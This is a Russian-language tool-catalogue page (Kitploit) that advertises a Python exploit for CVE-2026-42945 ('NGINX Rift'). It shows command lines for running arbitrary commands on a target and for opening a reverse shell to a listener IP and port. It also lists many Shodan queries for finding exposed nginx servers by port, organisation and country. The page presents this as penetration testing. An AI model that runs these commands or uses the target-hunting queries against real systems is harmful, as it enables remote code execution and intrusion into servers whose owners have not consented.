Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-42945-NGINX-Rift — Python-эксплойт для CVE-2026-42945 (NGINX Rift) с возможностью обратной оболочки и обнаружением целей на основе Shodan для тестирования на проникновение. | Kitploit
Инструменты/GitHubGitHub/renison-gohel/cve-2026-42945-nginx-rift
РазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubrenison-gohel/cve-2026-42945-nginx-rift

CVE-2026-42945-NGINX-Rift

Python-эксплойт для CVE-2026-42945 (NGINX Rift) с возможностью обратной оболочки и обнаружением целей на основе Shodan для тестирования на проникновение.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
13 месяцев назадЕщё не проверено

CVE-2026-42945-NGINX-Rift

root@kitploit:~
# Basic usage with target IP
python3 exploit.py --target-ip 192.168.1.100 --cmd "id"

# With custom port
python3 exploit.py --target-ip 192.168.1.100 --port 8080 --cmd "id"

# Reverse shell
python3 exploit.py --target-ip 192.168.1.100 --shell --listen-ip 10.0.0.1 --listen-port 4444

# Using the old --host parameter (still works)
python3 exploit.py --host 192.168.1.100 --cmd "id"

Поисковые запросы Shodan

Основные поисковые запросы Shodan:

root@kitploit:~
# Most specific - looking for nginx with the rift vulnerability pattern
http.title:"nginx" port:"19321"

# More general nginx search on non-standard ports
nginx port:"19321"

# Search for nginx with potential rift vulnerability indicators
"nginx/1." "19321"

# Search for nginx on high ports (common for test/dev environments)
nginx port:"8000-9000" http.title:"nginx"

# Search for nginx with specific headers that might indicate vulnerable config
"Server: nginx" "X-Delay"

Более целевые запросы:

root@kitploit:~
# Looking for nginx on the specific port used in the exploit
port:19321 nginx

# Find nginx servers that might be running in development environments
nginx "Welcome to nginx" port:8080,8000,8888,19321

# Search for nginx with unusual port ranges (where rift might be deployed)
nginx port:10000-20000

# Combining with HTTP methods that might indicate the rift endpoint
"POST /spray" http.title:nginx

Расширенные фильтры Shodan:

root@kitploit:~
# Very specific - looking for the exact port and nginx
port:19321 org:"Your Target Organization"

# Find nginx on all non-standard ports (excluding 80,443,8080)
nginx -port:80,443,8080

# Search by country and nginx on specific port
port:19321 country:US nginx

# Find nginx with potential debug/admin interfaces
http.title:"nginx" http.status:200 port:8000-9000
Скачать инструмент